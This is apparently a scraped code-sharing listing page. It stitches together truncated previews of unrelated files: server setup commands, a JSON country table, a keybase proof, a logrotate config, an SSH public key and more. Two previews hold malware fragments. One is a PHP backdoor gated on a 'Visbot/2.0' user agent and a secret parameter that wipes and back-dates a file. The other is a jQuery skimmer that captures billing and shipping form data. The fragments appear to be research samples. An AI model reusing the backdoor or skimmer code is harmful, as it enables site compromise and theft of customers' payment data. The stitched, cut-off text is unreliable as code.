ssh -i keyfile.pem ubuntu@<ip>
sudo apt -y update && sudo apt -y upgrade
sudo apt install -y p7zip-full build-essential linux-image-extra-virtual linux-source
echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf
sudo update-initramfs -u
# to activate latest kernel
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?PHP | |
$y0 = '/var/www/vhosts/redacted.nl/httpdocs/skin/adminhtml/default/default/images/left_button_back.gif'; | |
$m1 = '1382961301'; | |
$k2 = 'pa89785e'; | |
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----"; | |
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;[email protected])') { | |
if (isset($_GET[$k2])) { | |
$m1 = file_exists($y0) ? @filemtime($y0) : $m1; | |
@file_put_contents($y0, ''); | |
@touch($y0, $m1, $m1); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
set -e | |
echo | |
echo "Running pre-commit hooks to perform unit tests (see tools/git-*)" | |
function finish { | |
OVERRIDE="$BASE/.git-commit-override-jaja" | |
echo |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"AD": "84000", | |
"AE": "4975593", | |
"AF": "29121286", | |
"AG": "86754", | |
"AI": "13254", | |
"AL": "2986952", | |
"AM": "2968000", | |
"AN": "300000", | |
"AO": "13068161", |
# boot clean precise 12.04 instance
# Add universe upstream sources to apt/sources.list:
deb-src http://mirrors.digitalocean.com/ubuntu xenial universe
apt-get update
apt-get source yara
apt-get install python3 python3.2 python3-minimal
I hereby claim:
- I am gwillem on github.
- I am gwillem (https://keybase.io/gwillem) on keybase.
- I have a public key whose fingerprint is 2B1C C038 1DBE 3028 824E A71C 4EAD 1DBB 8B16 52B7
To claim this, I am signing this object:
$ dpkg-query --show blackfire-agent
blackfire-agent 1.9.2
$ cat /etc/logrotate.d/blackfire-agent
/var/log/blackfire/agent.log {
su blackfire blackfire
rotate 7
daily
missingok
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import re | |
import string | |
src = '_ ' * 2**20 # 2MB | |
whitespacere = re.compile('\s') | |
def replace(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
f1 = f2 = f3 = null; | |
se = false; | |
if ((f1 = jQuery('form:has([name^=billing])')).size()) f1.change(function() { | |
localStorage.setItem('__billing123', [this.id, $(this).serialize()]) | |
}); | |
if ((f2 = jQuery('form:has([name^=shipping])')).size()) f2.change(function() { | |
localStorage.setItem('__shipping123', [this.id, $(this).serialize()]) | |
}); | |
function ebn(n) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCrSuyjWT45ipAEmdeqv2hnKk/T541Na+AN8KpsmYTPSRrdfyYXcH2yHysg/aX9DEDyoZR1WgAW2HmM6rBQN9GfP2EJEzjP+1AzNHaOsCKSStUnUrKJlR0y3WXZny29lH/JqQykIUAC3YGqktwKNGxiQGZ/8HgicvV/0f4ebaqJ5S6o/ccA/Mytk8FNUtjZ9WFVMx9nj8DPLlgT7Z9v9rsPnzD5n5pTyVnttFqzBu4JOFGXkhiuHAQIqfLrLAExDabHH8bgxr8yIKUSEScooxHDY0uXONfGMhOQXQ3TFLuEkysT8qkcYCrfLwXh+pF6ITdDdoqaoxauq6zdid6KzyKn/bn60M1R5r/DIsVh03ASBr8j7JtEsIgHDRdShsF4BB0f6u9vwnsc0eLy8HMQo9zW9A22eT4k4O5WauMGzsyP6hP9mCYpKvDYMNHkC4dgnvaQiSerNmKXc8fBVlQELAaztGkHmdcLT+DFfY/I79UkkhLVEVMXgL9Mk1vawwnioY0M1ANxsmY1kqmTbgMACAULRlTYCzLMw8Ymn/uL5lO/KowLd+jg4rDcP6ZTabpLE3svucK/Y+pREbMLw/cFOVi45A4mmxoSusPvpLs13mGNLL2/XOE/pSQiPaDNn6qzFGtMd9B8tZG24Zpdk8KOW2bH6WkcgLOYhertHiedh7tAgw== willem2018 |